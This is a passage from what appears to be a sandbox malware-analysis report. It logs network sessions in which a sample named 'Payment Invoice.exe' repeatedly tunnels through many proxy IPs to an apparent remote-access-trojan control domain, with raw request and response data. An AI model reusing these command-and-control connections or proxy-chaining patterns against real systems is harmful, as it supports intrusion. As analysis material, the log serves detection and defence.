                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                470192.168.2.451508185.162.230.178807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.397489071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.551492929 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                471192.168.2.451386103.118.44.13680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.398211956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                472192.168.2.451512185.162.231.226807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.398231030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.552433014 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                473192.168.2.451439174.64.199.7941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.402436018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                474192.168.2.451445174.75.211.22241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.409137011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                475192.168.2.45144924.249.199.441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.410948992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                476192.168.2.45100551.158.98.197163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.415575981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.526885033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527913094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.527234077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.636466980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                477192.168.2.45094539.108.227.108807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.415899992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.754393101 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                478192.168.2.45145272.210.221.19741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.416551113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                479192.168.2.451518104.16.109.213807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.417962074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.571988106 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                480192.168.2.451520172.67.219.60807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.418298960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.572254896 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                481192.168.2.451523172.67.3.108807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.419393063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.573760033 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                482192.168.2.451001164.132.170.100807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.433470011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.526885986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527910948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.527230978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.636461020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:52.714204073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.584264994 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:58 GMT
                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                Mar 11, 2024 16:15:58.584358931 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                483192.168.2.451069192.163.202.88397827076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.433669090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.480000019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.559580088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683314085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.776876926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:52.792830944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.887343884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:28.887331009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:17.011152983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                484192.168.2.45148345.196.151.13454327076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.433671951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.652781963 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                Server: FaaS v1.3-20220203-7fa38bd5af
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 65
                                                                Proxy-Authenticate: Basic realm="Proxy"
                                                                Connection: close
                                                                Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                485192.168.2.45143243.129.228.4678917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.433758974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                486192.168.2.45146766.45.246.19488887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.476661921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
